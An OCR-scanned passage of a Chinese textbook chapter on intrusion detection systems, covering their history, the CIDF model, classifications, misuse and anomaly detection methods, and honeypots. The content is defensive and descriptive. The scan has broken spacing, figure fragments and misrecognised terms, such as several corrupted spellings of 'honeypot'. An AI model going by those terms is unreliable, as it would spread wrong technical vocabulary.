为 IDES。 该 模型 由 六 个 部 分 组 成 : 主体 、 对 象 、 审 计 记录 、 轮 廓 特征 、 异 常 记录 、 活 动 规 
则 。 它 独立 于 特定 的 系统 平台 、 应 用 环境 、 系 统 弱点 以 及 入 侵 类 型 。 

1988 年 的 Morris 蠕虫 事件 发 生 之 后 ， 网 络 安全 才 真 正 引起 了 军 方 、 学 术 界 和 企业 的 高 
度 重 视 。 美 国 空军 、 国 家 安全 局 和 能 源 部 共同 资助 空军 密码 支持 中 心 、 劳 伦 斯 利 弗 摩尔 国 
家 实验 室 、 加 州 大 学 戴 维 斯 分 校 、Haystack 实验 室 开展 对 分 布 式 入 侵 检 测 系统 (DIDS) 的 研 
究 , 将 基于 主机 和 基于 网 络 的 检测 方法 集成 到 一 起 。 DIDS 是 分 布 式 入 侵 检测 系统 历史 上 的 

-个 里 程 碑 般 的 产品 。 

1990 年 是 入 侵 检测 系统 发 展 史 上 的 一 个 分 水 岭 ， 在 这 之 前 ， 所 有 的 入 侵 检 测 系统 都 是 
基于 主机 的 ， 他 们 对 于 活动 的 检查 局 限于 操作 系统 审计 踪迹 数据 及 其 他 以 主机 为 中 心 的 数 
据 源 。 这 一 年 ， 加 州 大 学 戴 维 斯 分 校 的 L.T.Heberlein 等 人 开发 出 了 NSM 系统。 该 系统 第 

-次 将 网 络 流 作 为 审计 数据 的 来 源 ， 因 而 可 以 在 不 将 审计 数据 转换 成 统一 格式 的 情况 下 监 
控 异 种 主机 。 从 此 以 后 ， 入 侵 检测 翻 开 了 新 的 一 页 ， 两 大 阵营 正式 形成 : 基于 网 络 的 入 侵 
检测 系统 和 基于 主机 的 入 侵 检 测 系统 。 

从 20 世纪 90 年 代 至 今 ， 对 入 侵 检测 系统 的 研发 工作 已 呈现 出 百家争鸣 的 繁荣 局 面 ， 
并 在 智能 化 和 分 布 式 两 个 方向 取得 了 长 足 的 进展 。 


6.1.2 入侵 检测 系统 组 成 


美国 斯 坦 福 国 际 研究 所 (SRD 的 D.E.Denning 于 1986 年 首次 提出 一 种 入 侵 检测 模型 , 该 
模型 的 检测 方法 就 是 建立 用 户 正常 行为 的 描述 模型 ， 并 以 此 同 当前 用 户 活 动 的 审计 记录 进 
行 比较 ， 如 果 有 较 大 偏差 ， 则 表示 有 异常 活动 发 生 。 这 是 一 种 基于 统计 的 检测 方法 。 随 着 
技术 的 发 展 ， 后 来 人 们 又 提出 了 基于 规则 的 检测 方法 。 结 合 这 两 种 方法 的 优点 ， 人 们 设计 
出 很 多 入 侵 检 测 的 模型 。 通 用 入 侵 检 测 构架 (Common Intrusion Detection Framework，CIDF) 
组 织 试图 将 现 有 的 入 侵 检测 系统 标准 化 。CIDF 阐述 了 一 个 入 侵 检测 系统 的 通用 模型 (一 般 
称 为 CIDF 模型 ), 它 将 一 个 入 侵 检测 系统 分 为 以 下 4 个 组 件 :事件 产生 器 (Event generators)， 
用 EE 盒 表 示 ; 事件 分 析 器 (Event analyzers)， 用 A 盒 表 示 ， 响应 单元 Responseunits)， 用 R 
盒 表 示 ; 事件 数据 库 (Event databases)， 用 D 盒 表 示 ， 如 图 6-3 所 示 。 

(1) 事件 产生 器 (Event generators)。 从 整个 计算 环境 中 获得 事件 ， 并 向 系统 的 其 他 部 分 
提供 此 事件 。 

(2) 事件 分 析 器 (Event analyzers)。 分 析 得 到 的 数据 ， 并 产生 分 析 结 果 。 

(3) 响应 单元 (Responseunits)。 对 分 析 结 果 作出 反应 的 功能 单元 , 它 可 以 作出 切断 连接 、 
改变 文件 属性 等 强烈 反应 ， 也 可 以 只 是 简单 的 报警 。 
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(4) 事件 数据 库 (Event databases)。 存 放 各 种 中 间 和 最 终 数据 的 地 方 的 统称 ， 它 可 以 是 
复杂 的 数据 库 ， 也 可 以 是 简单 的 文本 文件 。 


6.1.3 入侵 检测 功能 


入 侵 检测 系统 ， 能 在 入 侵 攻 击 对 系统 发 生 危 害 前 检测 到 入 侵 攻击 ， 并 利用 报警 与 防护 
系统 驱逐 入 侵 攻击 ; 在 入 侵 攻 击 过 程 中 ， 尽 可 能 减少 入 侵 攻 击 所 造成 的 损失 ; 在 被 入 侵 攻 
击 后 ， 能 收集 入 侵 攻 击 的 相关 信息 ， 作 为 防范 系统 的 知识 添加 到 知识 库 内 ， 从 而 增强 系统 
的 防范 能 力 。 

入 侵 检测 的 主要 功能 包括 以 下 几 个 方面 。 

。 ”对 网 络 流量 的 跟踪 与 分 析 功 能 。 

对 已 知 攻 击 特征 的 识别 功能 。 

对 异常 行为 的 分 析 、 统 计 与 响应 功能 。 
特征 库 的 在 线 和 离线 升级 功能 。 

数据 文件 的 完整 性 检查 功能 。 

自 定义 的 响应 功能 。 

系统 漏洞 的 预报 警 功能 。 

IDS 探测 器 集中 管理 功能 。 

上 述 入 侵 检测 的 功能 是 在 入 侵 检测 工作 的 过 程 中 实现 的 。 入 侵 检测 工作 包括 信息 收集 、 
信息 分 析 和 响应 三 部 分 。 其 工作 原理 如 下 。 

(1) 信息 收集 : 入 侵 检测 的 第 一 步 是 信息 收集 ， 收 集 内 容 包括 系统 、 网 络 、 数 据 及 用 


的 来 源 一 般 来 自 以 下 四 个 方面 。 

。 ”系统 和 网 络 日 志文 件 。 

。 ”目录 和 文件 中 的 不 期 望 的 改变 。 

。 ”程序 执行 中 的 不 期 望 行为 。 

。 ”物理 形式 的 入 侵 信息 。 

(2) 信息 分 析 : 对 上 述 收集 到 的 有 关系 统 、 网 络 、 数 据 及 用 户 活动 的 状态 和 行为 等 信 
息 ， 一 般 通 过 三 种 技术 手段 进行 分 析 ， 包 括 模式 匹配 、 统 计 分 析 和 完整 性 分 析 。 其 中 前 两 
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种 方法 用 于 实时 的 入 侵 检 测 ， 而 完整 性 分 析 则 用 于 事后 分 析 。 

(3) 响应 : 入 侵 检测 系统 一 旦 发 现 有 符合 已 知 的 攻击 行为 模式 或 可 疑 的 攻击 行为 ， 就 
做 出 响应 ， 响 应 可 以 是 重新 配置 路 由 器 或 防火 墙 、 终 止 进程 、 切 断 连接 、 改 变 文件 属性 ， 
也 可 以 只 是 简单 的 告警 。 


6.1.4 入 侵 检 测 系统 分 类 
1. 根据 数据 来 源 和 系统 结构 分 类 


1) “基于 主机 的 入 侵 检测 系统 HIDS 

基于 主机 的 入 侵 检测 系统 的 输入 数据 来 源 于 系统 的 审计 日 志 ， 即 在 每 个 要 保护 的 主机 
上 运行 一 个 代理 程序 ， 一 般 只 能 检测 主机 上 发 生 的 入 侵 ， 基 于 主机 的 入 侵 检测 系统 一 般 在 
重要 的 系统 服务 器 、 工 作 站 或 用 户 计算 机 上 运行 ， 监 视 操作 系统 或 系统 事件 的 可 疑 活动 ， 
寻找 潜在 的 可 疑 活动 。 这 里 入 侵 检 测 系统 需要 定义 清楚 哪些 是 不 合法 的 活动 ， 然 后 把 这 种 
安全 策略 转换 成 入 侵 检 测 规则 。 基 于 主机 的 入 侵 检测 安装 于 受 保护 的 主机 上 收集 信息 ， 对 
主机 攻击 行为 做 出 响应 ， 保 护 的 一 般 是 所 在 的 系统 。 

2) ”基于 网 络 的 入 侵 检测 系统 NIDS 

基于 网 络 的 入 侵 检测 系统 的 输入 数据 来 源 于 网 络 的 信息 流 ， 该 类 系统 一 般 被 动 地 在 网 
络 上 监听 整个 网 络 上 的 信息 流 ， 通 过 捕获 数据 包 进 行 分 析 , 检测 该 网 段 上 发 生 的 网 络 入 侵 。 
基于 网 络 的 入 侵 检测 安装 于 网 络 信息 集中 通过 的 地 方 ， 如 中 心 交换 机 、 集 线 器 等 ， 对 所 有 
通过 的 网 络 数据 进行 收集 、 分 析 ， 并 对 攻击 行为 做 出 响应 。 一 般 网 络 型 入 侵 检测 系统 担负 
着 保护 整个 网 段 的 任务 。 

不 难看 出 ， 网 络 型 IDS 的 优点 主要 是 简便 。 一 个 网 段 上 只 需 安装 一 个 或 几 个 这 样 的 系 
统 ， 便 可 以 监测 整个 网 段 的 情况 ， 且 由 于 往往 分 出 单独 的 计算 机 做 这 种 应 用 ， 不 会 给 运行 
关键 业务 的 主机 带 来 负载 上 的 增加 。 但 由 于 现在 网 络 的 日 趋 复杂 和 高 速 网 络 的 普及 ， 这 种 
结构 正 受 到 越 来 越 大 的 挑战 。 

典型 的 入 侵 检测 系统 如 图 6-4 所 示 。 在 每 个 网 段 和 重要 服务 器 上 都 安装 了 入 侵 检测 系 
统 ， 以 保护 整个 系统 的 安全 。 


基于 主机 
加 | 入 侵 检测 


Rl 


邮件 服务 器 


企业 内 部 网 
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3) “分 布 式 入 侵 检测 系统 DIDS 

数据 源 于 网 络 中 的 网 络 包 ， 与 基于 网 络 的 入 侵 检测 系统 不 同 的 是 ， 它 采用 分 布 检测 、 
集中 管理 的 方法 。 即 在 每 个 网 段 安装 一 个 黑匣子 ， 黑 匣子 用 来 监测 其 所 在 网 段 上 的 数据 流 ， 
并 根据 集中 安全 管理 中 心 制订 的 安全 策略 、 响 应 规则 等 来 分 析 和 检测 网 络 数 据 ， 同 时 向 集 
中 安全 管理 中 心 发 回 安全 事件 信息 。 集 中 安全 管理 中 心 是 整个 分 布 式 入 侵 检测 系统 面向 用 
户 的 界面 。 


2. 根据 检测 方法 分 类 


1)” 误 用 检测 模型 (Misuse Detection) 

检测 与 已 知 的 不 可 接受 行为 之 间 的 匹配 程度 。 定 义 不 可 接受 行为 ， 那 么 每 种 能 够 与 之 
匹配 的 行为 都 会 引起 报警 。 收 集 非 正常 操作 的 行为 特征 ， 建 立 相关 的 特征 库 ， 当 监测 的 用 
户 或 系统 行为 与 库 中 的 记录 相 匹配 时 ， 系 统 就 认为 这 种 行为 是 入 侵 。 这 种 检测 模型 误 报 率 
低 、 漏 报 率 高 。 对 于 已 知 的 攻击 ， 它 可 以 详细 、 准 确 地 报告 出 攻击 类 型 ， 但 是 对 未 知 攻击 
却 效果 有 限 ， 而 且 特 征 库 必须 不 断 更 新 。 

2) “异常 检测 模型 (Anomaly Detection) 

基于 异常 的 检测 技术 则 是 先 定 义 一 组 系统 “正常 ”情况 的 数值 ， 如 CPU 利用 率 、 内 存 
利用 率 、 文 件 校 验 和 等 (这 类 数据 可 以 人 为 定义 ， 也 可 以 通过 观察 系统 ， 并 用 统计 的 办 法 得 
出 )， 然 后 将 系统 运行 时 的 数值 与 所 定义 的 “正常 ”情况 比较 ， 得 出 是 否 有 被 攻击 的 迹象 。 
这 种 检测 方式 的 核心 在 于 如 何 定义 所 谓 的 “正常 ”情况 。 

例如 ， 针 对 特定 用 户 的 操作 习惯 与 某 种 操作 的 频率 做 统计 ， 得 出 正常 操作 模型 之 后 
对 后 续 的 操作 进行 监视 ， 一 旦 发 现 偏离 正常 统计 学 意义 上 的 操作 模式 ， 即 进行 报警 。 

这 种 检测 模型 漏 报 率 低 ， 误 报 率 高 。 因 为 不 需要 对 每 种 入 侵 行 为 进行 定义 ， 所 以 能 有 
效 检测 未 知 的 入 侵 。 

3. 根据 系统 各 个 模块 运行 的 分 布 方式 分 类 


1) “集中 式 入 侵 检测 系统 

系统 的 各 个 模块 (包括 事件 产生 器 、 事 件 分 析 器 、 响 应 单元 和 事件 数据 库 ) 都 集中 在 一 
台 主机 上 运行 ， 这 种 方式 应 用 于 网 络 环境 比较 简单 的 情况 。 

2) “分 布 式 入 侵 检测 系统 

系统 的 各 个 模块 分 布 在 网 络 中 不 同 的 计算 机 、 设 备 上 ， 一 般 来 说 分 布 性 主要 体现 在 事 
件 产生 模块 上 ， 如 果 网 络 环境 比较 复杂 、 数 据 量 比较 大 ， 那 么 事件 分 析 模 块 也 会 分 布 在 不 
同 的 计算 机 和 设备 上 。 


6.2 ”入侵 检测 技术 


本 节 介 绍 误 用 检测 、 异 常 检测 和 高 级 检测 技术 。 在 介绍 入 侵 检测 技术 的 同时 ， 也 将 对 
入 侵 响 应 技术 进行 介绍 。 


6.2.1 误 用 检测 技术 


误 用 检测 对 于 系统 事件 提出 的 问题 是 ， 这 个 活动 是 恶意 的 吗 ? 误 用 检测 涉及 对 入 侵 指 
示 器 已 知 的 具体 行为 的 描述 信息 ， 然 后 为 这 些 指示 器 过 滤 事件 数据 。 

误 用 入 侵 检测 根据 已 知 的 入 侵 模式 来 检测 入 侵 。 入 侵 者 常常 利用 系统 和 应 用 软件 中 的 
弱点 来 实施 攻击 ， 而 这 些 弱点 易 编 成 某 种 模式 ， 如 果 入 侵 者 的 攻击 方式 正好 匹配 上 检测 系 
统 中 的 模式 库 ， 则 就 认为 有 入 侵 行为 发 生 。 其 模型 如 图 6-5 所 示 。 

误 用 检测 技术 主要 包括 基于 规则 的 专家 系统 、 模 式 匹配 系统 和 状态 转换 分 析 系 统 。 


6-5 ” 误 用 入 侵 检测 模型 


1. 基于 规则 的 专家 系统 

专家 系统 是 误 用 检测 技术 中 运用 最 多 的 一 种 方法 。 用 专家 系统 对 入 侵 进 行 检测 ， 经 党 
是 针对 有 特征 的 入 侵 行为 。 所 谓 的 规则 ， 即 是 知识 ， 不 同 的 系统 与 设置 具有 不 同 的 规则 ， 
将 有 关 入 侵 的 知识 转化 为 逊 then 结构 ， 直 部 分 为 入 侵 特征 ，then 部 分 是 系统 防范 措施 。 当 
其 中 某 个 或 某 部 分 条 件 满 足 时 ， 系 统 就 会 判断 为 入 侵 行为 发 生 。 运 用 专家 系统 防范 入 侵 行 
为 的 有 效 性 完全 取决 于 专家 系统 知识 库 的 完备 性 ， 而 建立 一 个 完备 性 的 知识 库 对 于 一 个 大 
型 网 络 系统 往往 是 不 可 能 的 。 

在 具体 实现 中 ， 专 家 系统 主要 面临 以 下 两 个 问题 。 

(1) 全 面 性 问题 ， 即 难以 从 各 种 入 侵 手 段 中 抽象 出 全 面 的 规则 化 知识 。 

(2) 效率 问题 ， 即 需要 处 理 的 数据 量 过 大 ， 而 且 在 大 型 系统 上 ， 如 何 获得 实时 的 、 连 
续 的 响应 也 是 个 问题 。 

由 于 专家 系统 存在 上 述 问题 ， 现 已 不 宜 单独 用 于 入 侵 检 测 或 单独 作为 商品 软件 。 较 实 
用 的 方法 是 将 专家 系统 与 采用 异常 检测 方法 的 入 侵 检 测 系统 结合 在 一 起 使 用 。 


2. 模式 匹配 系统 


模式 匹配 检测 系统 是 Kumar 在 1995 年 提出 的 , 它 的 一 大 优点 是 内需 收集 相关 的 数据 
集合 ， 显 著 减 少 系统 的 负担 ， 且 技术 已 经 相当 成 熟 。 它 与 病毒 防火 墙 采用 的 方法 一 样 ， 检 
测 准确 率 和 效率 相当 高 。 该 方法 存在 的 弱点 是 需要 不 断 升级 以 对 付 不 断 出 现 的 黑客 攻击 手 
法 ， 且 不 能 检测 到 从 未 出 现 过 的 黑客 攻击 手段 。 

简单 模式 匹配 的 特点 是 原理 简单 、 扩 展 性 好 、 检 测 效 率 高 、 可 以 实时 检测 ， 但 是 误 报 
率 高 ， 而 且 在 性 能 上 存在 很 大 问题 。 著 名 的 Snort 就 是 采用 了 这 种 检测 手段 。 寻 求 高 效 的 
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模式 匹配 算法 是 当今 的 一 大 难题 。 
3. 状态 转换 分 析 系 统 


状态 转换 分 析 将 入 侵 过 程 看 作 一 个 行为 序列 ， 这 个 行为 序列 导致 系统 从 初始 状态 转 入 
被 入 侵 状 态 。 分 析 时 ， 首 先 针对 每 一 种 入 侵 方法 确定 系统 的 初始 状态 和 被 入 侵 状态 ， 以 及 
导致 状态 转换 的 转换 条 件 ， 即 导致 系统 进入 被 入 侵 状 态 必须 执行 的 操作 。 然 后 用 状态 转换 
图 来 表示 每 一 个 状态 和 事件 。 

状态 转换 图 是 贯穿 模型 的 图 形 化 表示 。 如 图 6-6 所 示 ， 显 示 了 一 个 状态 转换 图 表 的 组 
成 以 及 如 何 使 用 它们 来 代表 一 个 序列 。 节 点 代表 状态 ， 弧 代表 转换 。 在 状态 转换 表格 中 ， 
表达 入 侵 的 基本 思想 是 所 有 入 侵 者 都 是 从 拥有 有 限 的 权限 出 发 ， 并 且 利 用 系统 脆弱 性 来 获 
取 一 些 成 果 。 开 始点 的 有 限 特权 和 成 功 的 入 侵 都 能 作为 系统 状态 来 表达 。 


图 6-6 ”状态 转换 图 


Petri 网 是 一 种 类 似 于 状态 转换 图 分 析 的 方法 。 利 用 Petri 网 的 有 利之 处 在 于 它 能 一 般 
化 、 图 形 化 地 表达 状态 ， 简 洁 明了 。 下 面 是 这 种 方法 的 一 个 简单 示例 ， 表 示 在 1 分 钟 内 如 
果 登 录 失 败 的 次 数 超过 4 次 ， 系 统 便 发 出 报警 ， 其 中 竖 线 代表 状态 转换 ， 如 果 在 状态 S1 
发 生 登 录 失 败 ， 则 产生 一 个 标志 变量 ， 并 存储 事件 发 生 的 时 间 T1， 同 时 转 入 状态 S2。 如 
果 在 状态 S4 时 又 有 登录 失败 ， 而 且 这 时 的 时 间 (T2-T1)<60 秒 ， 则 系统 转 入 状态 S5， 即 为 
入 侵 状态 ， 系 统 发 出 报警 并 采取 相应 措施 ， 如 图 6-7 所 示 。 


Tl T2 
登录 失败 登录 失败 登录 失败 登录 失败 


6-7 ”Petri 网 分 析 1 分 钟 4 次 登录 失败 


6.2.2 异常 检测 技术 


基于 异常 的 入 侵 检 测 方法 主要 来 源 于 这 样 的 思想 : 任何 人 的 正常 行为 都 有 一 定 的 规律 ， 
并 且 可 以 通过 分 析 这 些 行为 产生 的 日 志 信息 总 结 出 这 些 规律 ， 而 入 侵 行 为 通常 和 正常 的 行 
为 存在 严重 的 差异 ， 通 过 检查 出 这 些 差 异 就 可 以 检测 出 这 些 入 侵 。 这 样 就 可 以 检测 出 非法 
的 入 侵 行为 甚至 是 通过 未 知 方法 进行 的 入 侵 行为 。 此 外 不 属于 入 侵 的 异常 用 户 行为 也 能 被 


检测 到 。 异 常 检测 模型 如 图 6-8 所 示 。 中 间 区 域 是 正常 行为 范围 ， 两 端 是 异常 行为 范围 ， 
达到 异常 行为 范围 的 操作 就 认为 是 入 侵 。 


图 6-8 异常 检测 模型 


异常 检测 依靠 一 个 假定 : 用 户 表现 为 可 预测 的 、 一 致 的 系统 使 用 模式 。 例 如 ， 如 果 用 
户 A 仅 仅 在 上 午 9 点 钟 到 下 午 5 点 钟 之 间 在 办 公 室 时 用 计算 机 , 则 用 户 A 在 晚上 的 活动 是 
异常 的 ， 就 可 能 是 入 侵 。 常 用 的 异常 检测 技术 有 基于 统计 的 异常 入 侵 检测 和 基于 神经 网 络 
的 异常 入 侵 检测 技术 。 


1. 基于 统计 的 异常 入 侵 检 测 


统计 方法 是 商业 入 侵 检测 系统 中 最 常见 的 异常 检测 方法 。 在 统计 模型 中 常用 的 测量 参 
数 包 括 审 计 事件 的 数量 、 间 隔 时 间 、 资 源 消耗 情况 等 ， 具 体 特征 包括 : CPU 的 使 用 ，LIO 
的 使 用 ， 使 用 地 点 及 时 间 ， 邮 件 使 用 ， 编 辑 器 使 用 ， 编 译 器 使 用 ， 所 创建 、 删 除 、 访 问 或 
改变 的 目录 及 文件 ， 网 络 上 的 活动 等 。 

描述 上 述 特 征 的 变量 类 型 有 以 下 几 种 。 

。 ”操作 密度 : 度量 操作 执行 的 频率 ， 常 用 于 检测 一 段 时 间 内 的 异常 行为 。 

e ”审计 记录 分 布 : 度量 在 最 新 记录 中 所 有 操作 类 型 的 分 布 情况 。 

。 ”范畴 尺度 : 度量 在 一 定 动作 范畴 内 特定 操作 的 分 布 情况 。 

。 ”数值 尺度 : 度量 产生 数值 结果 的 操作 ， 如 CPU 占用 率 、IO 使 用 频繁 程度 等 。 

可 用 于 入 侵 检测 的 统计 模型 有 4 种， 每 一 种 模型 适用 于 一 个 特定 类 型 的 系统 度量 。 

1) “操作 模型 

该 模型 假设 异常 可 通过 测量 结果 与 一 些 固定 指标 相 比较 得 到 ， 而 固定 指标 可 以 根据 经 
验 值 或 一 段 时 间 内 的 统计 平均 得 到 。 举 例 来 说 ， 在 短 时 间 内 的 多 次 失败 的 登录 很 可 能 是 口 
尝试 攻击 。 

2) 方差 模型 

该 模型 计算 参数 的 方差 ， 设 定 其 置信 区 间 ， 当 测量 值 超过 署 信 区 间 的 范围 时 表明 有 可 
能 异常 。 

3) ”多 元 模型 

该 模型 是 方差 模型 的 扩展 ， 通 过 同时 分 析 多 个 参数 实现 检测 。 
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人 9” 马尔 柯 夫 过 程 模型 

将 每 种 类 型 的 事件 定义 为 系统 状态 ， 用 状态 转移 矩阵 来 表示 状态 的 变化 ， 若 对 应 于 发 
生 事 件 的 状态 矩阵 中 转移 概率 较 小 ， 则 该 事件 可 能 是 异常 事件 。 

统计 方法 的 最 大 优点 是 它 可 以 “学 习 ” 用 户 的 使 用 习惯 ， 从 而 具有 较 高 校 出 率 与 可 用 
性 。 但 是 它 的 “学 习 ” 能 力也 给 入 侵 者 以 机 会 通过 逐步 “训练 ”使 入 侵 事 件 符合 正常 操作 
的 统计 规律 ， 从 而 透 过 入 侵 检 测 系统 。 


2. 基于 神经 网 络 的 入 侵 检测 


利用 神经 网 络 检测 入 侵 的 基本 思想 是 用 一 系列 信息 单元 训练 神经 单元 ， 这 样 在 给 定 一 
组 输入 后 ， 就 可 能 预测 输出 。 与 统计 理论 相 比 ， 神 经 网 络 更 好 地 表达 了 变量 间 的 关系 ， 并 
且 能 够 自动 学 习 和 更 新 。 实 验 表明 ， 对 于 一 般 用 户 ,不 可 预测 的 行为 只 占 了 很 少 的 一 部 分 。 

用 于 检测 的 神经 网 络 模 块 结构 大 致 是 这 样 的 : 当前 命令 和 刚 过 去 的 W 个 命令 组 成 了 网 
络 的 输入 ,其 中 W 是 神经 网 络 预测 下 一 个 命令 时 所 包含 的 过 去 命令 集 的 大 小 , 根据 用 户 的 
代表 性 命令 序列 训练 网 络 后 ， 该 网 络 就 形成 了 相应 用 户 的 特征 集 ， 于 是 网 络 对 下 一 事件 的 
预测 错误 率 在 一 定 程度 上 反映 了 用 户 行为 的 异常 程度 。 基 于 神经 网 络 的 检测 思想 的 示意 图 
如 图 6-9 所 示 。 


ls | 
chmod | 
预测 的 下 一 个 命令 
| 
pwd 1 
1 
' 
1 
输入 层 | 输出 层 
! 
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6.2.3 ”高 级 检测 技术 

高 级 入 侵 检 测 技术 主要 包括 免疫 系统 方法 、 遗 传 算法 、 数 据 挖掘 方法 和 数据 融合 等 。 
这 些 方法 即 可 用 于 异常 检测 ， 也 可 用 于 特征 检测 。 它 们 不 一 定 是 检测 入 侵 的 方法 ， 有 的 是 
为 解决 入 侵 检 测 其 他 方面 的 问题 提出 的 。 

1. 免疫 系统 方法 

在 一 个 研究 项 目 中 ,研究 者 提出 的 问题 是 “< 如何 用 保护 自己 的 方式 装配 计算 机 系统 ? ”。 
在 回答 这 个 问题 时 ， 他 们 注意 到 在 生理 免疫 系统 和 系统 保护 机 制 之 间 有 显著 的 相似 性 。 计 
算 机 安全 的 多 数 问题 都 可 以 归结 为 对 自我 (合法 用 户 、 授 权 的 行动 等 ) 和 非 我 (入 侵 者 、 计 算 


机 病毒 等 ) 的 识别 ， 而 生物 免疫 系统 千 百 万 年 来 一 直 在 努力 解决 这 一 问题 。 人 们 从 生物 免疫 
系统 中 受到 启发 ， 提 出 了 基于 免疫 系统 基本 原理 的 入 侵 检测 方法 。 

生物 免疫 系统 中 工 淋巴 细胞 在 胸腺 中 产生 。T 淋巴 细胞 ， 简 称 T 细胞 ， 是 免疫 系统 中 
多 种 特异 性 细胞 之 一 。 淋 巴 细胞 的 表面 覆盖 着 受 体 ， 受 体能 与 抗原 绑 定 。 每 个 淋巴 细胞 具 
有 一 种 特异 性 受 体 ， 每 一 种 受 体 与 一 小 群 结构 相近 的 抗原 绑 定 。T 细胞 上 的 受 体 由 一 伪 随 
机 过 程 产生 。 当 工 细胞 在 胸腺 中 成 熟 时 ， 它 们 要 经 历 一 个 称 作 “阴性 选择 ”的 检查 过 程 。 
在 这 一 检查 过 程 中 ， 绑 定 自 身 蛋白 的 T 细 胞 被 破坏 掉 ， 那 些 不 绑 定 自身 蛋白 的 了 细胞 被 保 
留 下 来 。 它 们 被 输送 到 身体 的 各 个 部 分 ， 作 为 免疫 保护 机 制 的 基础 。 以 这 种 方法 产生 的 T 
细胞 能 覆盖 绝 大 部 分 的 抗原 空间 。 人 们 从 这 一 机 制 得 到 启发 ， 在 得 到 系统 “正常 轮廓 ”的 
基础 上 ， 产 生 履 盖 整 个 异常 空间 的 检测 特征 。 

基于 免疫 学 理论 的 入 侵 检测 是 一 种 以 基于 特征 的 入 侵 检测 的 方式 。 这 是 它 最 鲜明 的 
特征 。 

2. 遗传 算法 

遗传 算法 是 进化 算法 的 一 个 实例 。 进 化 算法 吸收 达尔 文 自然 选择 法 则 ( 适 者 生存 ) 的 思 
想来 解决 问题 。 遗 传 算法 用 允许 染色 体 的 结合 或 突变 以 形成 新 个 体 的 方法 来 使 用 染色 体 。 

在 研究 入 侵 检测 的 遗传 算法 的 研究 者 眼中 ， 入 侵 检测 处 理 包括 为 事件 数据 定义 假设 向 
量 ， 向 量 指示 一 次 入 侵 或 指示 不 是 一 次 入 侵 。 然 后 测试 假设 是 否 正确 ， 并 基于 测试 结果 尽 
力 设计 一 个 改进 的 假设 。 重 复 这 个 处 理 直 至 找到 一 个 解决 方法 为 止 。 

3. 数据 挖掘 方法 


数据 挖 气 (Data Mining) 也 称 数据 库 中 的 知识 发 现 (Knowledge Discovery in Database， 
KDD)。 数据 挖掘 是 指 从 大 型 数据 库 中 提取 人 们 感 兴趣 的 知识 ,提取 的 知识 一 般 可 表示 为 概 
念 、 规 则 、 规 律 、 模 式 等 形式 。 

入 侵 检测 的 数据 源 中 包含 大 量 审计 记录 ， 而 且 审计 记录 大 多 是 文件 形式 存放 ， 若 单独 
依靠 手工 方法 去 发 现 记录 中 异常 现象 是 不 够 的 ， 操 作 起 来 相当 不 方便 ， 也 不 容易 找 出 审计 
记录 间 的 相互 关系 。WenkeLee 和 SalvatoreJ.Stolfo 将 数据 采掘 技术 应 用 到 入 侵 检测 研究 领 
域 中 ， 从 审计 数据 或 数据 流 中 提取 感 兴趣 的 知识 ， 并 用 这 些 知识 去 检测 异常 入 侵 和 已 知 的 
入 侵 。 

4. 数据 融合 

数据 融合 是 针对 当前 入 侵 检 测 系统 误 警 率 高 而 提出 的 。 

当前 多 数 基 于 网 络 的 商业 入 侵 检测 系统 主要 依赖 于 他 报头 信息 进行 特征 匹配 , 甚至 那 
些 集成 了 基于 网 络 和 基于 主机 的 入 侵 检测 系统 也 没有 把 分 离 的 信息 在 更 大 的 范围 内 联系 起 
来 ， 从 而 导致 了 大 量 的 误 警 。 解 决 这 一 问题 就 需要 集成 多 数据 源 的 信息 。 

近年 来 ， 数 据 融合 领域 的 研究 非常 活跃 ， 取 得 了 巨大 的 进步 ， 这 为 数据 融合 技术 应 用 
于 入 侵 检测 提供 了 强 有 力 的 支持 。 数 据 融合 技术 的 关键 问题 是 怎样 把 数据 结合 起 来 。 哪 些 
数据 较 另 一 些 数据 更 可 信 ， 哪 种 分 析 方 法 的 结果 比 另 一 种 方法 更 可 靠 ， 这 些 都 应 该 考虑 到 。 
集成 多 数据 源 的 信息 是 降低 误 警 率 的 关键 。 
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6.2.4 入侵 诱骗 技术 
1. 概念 


入 侵 诱骗 ， 就 是 通过 诱导 、 欺 骗 的 方式 对 入 侵 行 为 进行 牵制 、 转 移 甚 至 控制 。 其 目的 
是 用 特有 的 特征 吸引 入 侵 者 ， 使 入 侵 者 相信 信息 系统 存在 有 价值 的 、 可 利用 的 安全 弱点 ， 
而 且 具 有 一 些 可 攻击 窃取 的 资源 (当然 这 些 资源 是 伪造 的 或 不 重要 的 )， 并 将 入 侵 者 引 向 这 
些 错误 的 资源 ， 同 时 对 入 侵 者 的 各 种 攻击 行为 进行 监控 、 分 析 并 找到 有 效 的 对 付 方法 。 

入 侵 诱骗 的 核心 不 在 于 解决 一 个 或 几 个 安全 问题 ， 而 是 一 种 思想 ， 一 种 化 被 动 防御 为 
主动 防御 的 思想 。 入 侵 诱 骗 技术 充分 体现 了 网 络 安全 主动 防御 的 思想 ， 为 网 络 安全 研究 增 
加 了 一 个 利器 ， 使 传统 网 络 安全 防御 技术 面临 的 被 动 挨打 局 面 得 以 扭转 ， 因 此 ， 在 网 络 安 
全 研究 深入 开展 的 过 程 中 ， 离 不 开 入 侵 诱骗 技术 的 研究 。 


2. 密 钠 技术 及 其 基本 原理 


密 饶 是 一 种 伪装 成 真实 的 目标 系统 来 诱骗 攻击 者 攻击 或 损害 的 网 络 安全 工具 。 蜜 钢 的 

主要 目标 是 容忍 攻击 者 入 侵 ， 记 录 并 学 习 攻 击 者 的 攻击 工具 、 手 段 、 动 机 、 目 的 等 行为 信 
息 ， 尤 其 是 未 知 攻击 行为 信息 ， 从 而 调整 网 络 安全 策略 ， 提 高 系统 安全 性 能 。 同 时 蜜 饶 还 
具有 转移 攻击 者 注意 力 ， 消 耗 其 攻击 资源 、 意 志 ， 间 接 保护 真实 目标 系统 的 作用 。 
际 蜜 饶 技 术 研 究 组 织 Honey net Project 的 创始 人 Lance Spitzner 给 出 了 蜜 铅 的 权威 定 
义 : 蜜 铅 是 一 种 安全 资源 ， 其 价值 在 于 被 扫描 、 攻 击 和 攻陷 。 蜜 馈 并 不 向 外 界 用 户 提供 任 
何 服务 ， 所 有 进出 蜜 钢 的 网 络 流量 都 可 能 预示 着 一 次 扫描 、 攻 击 和 攻陷 ， 蜜 钢 的 核心 价值 
在 于 对 这 些 非法 活动 进行 监视 、 检 测 和 分 析 。 蜜 钢 系 统 根据 应 用 目的 可 以 分 为 两 类 : 业务 
型 蜜 饶 系 统 和 研究 型 蜜 钢 系 统 。 前 者 用 来 提高 商业 组 织 的 安全 性 能 ， 而 后 者 主要 用 来 尽 可 
